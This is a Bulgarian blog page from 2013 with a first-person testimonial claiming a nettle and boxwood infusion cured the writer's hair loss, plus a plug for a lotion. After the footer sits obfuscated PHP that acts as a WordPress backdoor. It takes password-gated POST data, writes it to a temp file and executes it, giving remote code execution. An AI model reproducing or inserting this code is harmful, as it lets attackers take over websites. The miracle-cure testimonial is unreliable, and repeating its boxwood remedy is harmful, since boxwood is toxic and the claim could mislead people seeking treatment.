Избавих се от косопад с настойка от коприва и чимшир | Косопад

Излекувах се от косопад с една проста рецепта

Рецепта с коприва и чимшир ме спаси от косопад

Излекувах се от косопад с рецепта от коприва

Излекувах се от косопад с рецепта от коприва

Здравейте! Казвам се Валентина Петкова и съм от един малък крайдунавски град. Дълго време страдах от косопад, преминах през всякакви изпитания и изпробвах скъпи лекарства, но нищо не помагаше.

Когато станах на 27 години се омъжих за съпруга си и скоро след това забременях. Щастието ми обаче бе помрачено от прогресивно засилващ се косопад и в един момент се уплаших сериозно, че наистина мога да остана без коса. Попитах личния си гинеколог какво да направя, а той ме успокои, че подобно състояние е често срещано по време на бременност и впоследствие ще се оправи.

Родих моето момченце, но проблемът си остана. Той проходи и тръгна на ясла, а моята коса продължи да капе, макар и с по – бавни темпове. Накрая се реших да отида на дерматолог и той ми изписа някакви безумно скъпи хапчета против косопад, за които платих общо повече от 200 лева. Спазвах стриктно процедурите, но нищо не стана. Безпокойството ми се усили и се подготвих, че ще оплешивея съвсем.

В този момент споделих болката си с една моя колежка от магазина, без да се надявам на помощ. Просто поисках да излея мъката, но тогава стана чудо. Бавната Валя, както я наричахме, ми препоръча да изпробвам методите на нетрадиционната медицина и по спомени от своята младост издиктува рецепта срещу косопад с настойка от коприва и чимшир. Още след първите дни косата ми спря да пада, а скоро след това дори и се сгъсти. Наистина, никога не стана каквато си беше в детските ми години, но все пак вече нямах косопад и върнах самочувствието си.

Друга моя близка успя да реши проблема с помощта на лосионът срещу косопад „Ефект – 2“ и сега също се чувства щастлива. Споделям това, за да дам нова надежда на всички, които страдат от косопад и оплешивяване. Никога не се отчайвайте, защото всяка болка си има решение. Просто трябва да уцелите точното нещо и да не се предавате.

01. април 2013 20:09:44 от Косопад
Категории: Лосион срещу косопад, Споделено | Етикети: , , | 3 коментари

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}